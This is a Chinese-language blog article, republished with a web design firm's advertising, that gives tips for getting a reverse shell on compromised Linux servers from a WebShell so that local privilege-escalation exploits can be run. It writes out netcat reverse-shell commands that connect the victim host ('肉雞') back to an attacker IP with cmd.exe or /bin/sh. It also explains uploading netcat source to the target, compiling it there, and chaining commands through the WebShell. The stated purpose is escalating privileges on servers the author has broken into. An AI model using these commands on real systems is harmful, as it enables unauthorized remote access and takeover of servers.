Linux下反彈CmdLineShell小技巧有哪些

這篇文章主要為大家展示了“Linux下反彈CmdLine Shell小技巧有哪些”,內(nèi)容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“Linux下反彈CmdLine Shell小技巧有哪些”這篇文章吧。

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于成都做網(wǎng)站、成都網(wǎng)站制作、福建網(wǎng)絡(luò)推廣、小程序制作、福建網(wǎng)絡(luò)營銷、福建企業(yè)策劃、福建品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等,從售前售中售后,我們都將竭誠為您服務(wù),您的肯定,是我們最大的嘉獎;成都創(chuàng)新互聯(lián)公司為所有大學(xué)生創(chuàng)業(yè)者提供福建建站搭建服務(wù),24小時服務(wù)熱線:18980820575,官方網(wǎng)址:muchs.cn

Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是我們的EXP必須在可交互環(huán)境運行,否則如果直接在WebShell執(zhí)行,即使能提權(quán)成功,我們也沒法利用到。所以我們需要先反彈一個CmdLine Shell回來(直接說成CmdShell怕人誤解...因為Win有個cmd.exe ^_^),然后在命令行終端下執(zhí)行EXP進行提權(quán)。

一般情況下,絕大多數(shù)人都會通過PHP WebShell的Back Connect功能彈回一個Shell,但是有時候會碰到服務(wù)器不支持PHP或者WebShell沒法反彈的情況,比如這兩天朋友給我的一個JSPShell所在服務(wù)器只支持JSP,不支持PHP。這時候,我們經(jīng)典的netcat就可以派上用場了。

平時在Windows下做事的時候,在必要的情況下我們可以先在本機運行nc -vv -lp 1234監(jiān)聽端口,然后在肉雞上nc 12.21.12.21 1234 -e cmd.exe給我們反彈一個CmdShell,這個方法在Linux仍然可行。

在本機監(jiān)聽后,在WebShell運行nc 12.21.12.21 1234 -e /bin/sh就能彈一個CmdLine Shell給我們。

但我們經(jīng)常碰到的情況并不都是這么100%順利的,像昨晚整的那兩臺,每臺都是不能直接執(zhí)行nc的。一臺有nc,但執(zhí)行從是不起作用,另外一臺直接壓根就沒有nc....

不過,這個難不倒我們,我們可以給他裝一個嘛,比較快捷的方法是,我們可以到http://netcat.sourceforge.net/download.php下載nc的源碼,先在我們自己linux機器上編譯好以后把bin文件傳上去(我開始傳的我的Debian自帶的netcat,結(jié)果仍然不能運行....)。如果還不行,那就把源碼傳上去,在目標(biāo)機器上直接編譯。

昨晚那兩臺機器,一臺我是直接傳的本地編譯后的,一臺是在目標(biāo)機器上編譯的。如果直接傳的nc可以運行的話還比較好說,如果需要在目標(biāo)機器上編譯的話,這里有點小技巧:

因為在得到CmdLine Shell前,我們只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等回顯。假如我們的WebShell在/var/www/site目錄,那么我們每次執(zhí)行命令默認(rèn)的當(dāng)前路徑都是/var/www/site,而我們的netcat源碼包解壓在了/tmp/netcatsrc文件夾,這樣的話,我們編譯netcat的時候,configure還好說,可用/tmp/netcatsrc/configure命令,但下一步make的時候就不行了,因為當(dāng)前路徑是/var/www/site,而不是我們想要的/tmp/netcatsrc/,所以我們configure完了make的時候會報錯。

解決這個問題其實也很簡單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make

用分號隔開寫,把make跟在目錄切換命令后面,這樣編譯的時候就不會報錯了。

在還沒有得到CmdLine Shell的時候,這樣的寫法還是很有用的。

以上是“Linux下反彈CmdLine Shell小技巧有哪些”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學(xué)習(xí)更多知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!

分享標(biāo)題:Linux下反彈CmdLineShell小技巧有哪些
文章位置:http://muchs.cn/article48/jophhp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供App開發(fā)標(biāo)簽優(yōu)化、手機網(wǎng)站建設(shè)、網(wǎng)站建設(shè)、外貿(mào)網(wǎng)站建設(shè)企業(yè)建站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都定制網(wǎng)站網(wǎng)頁設(shè)計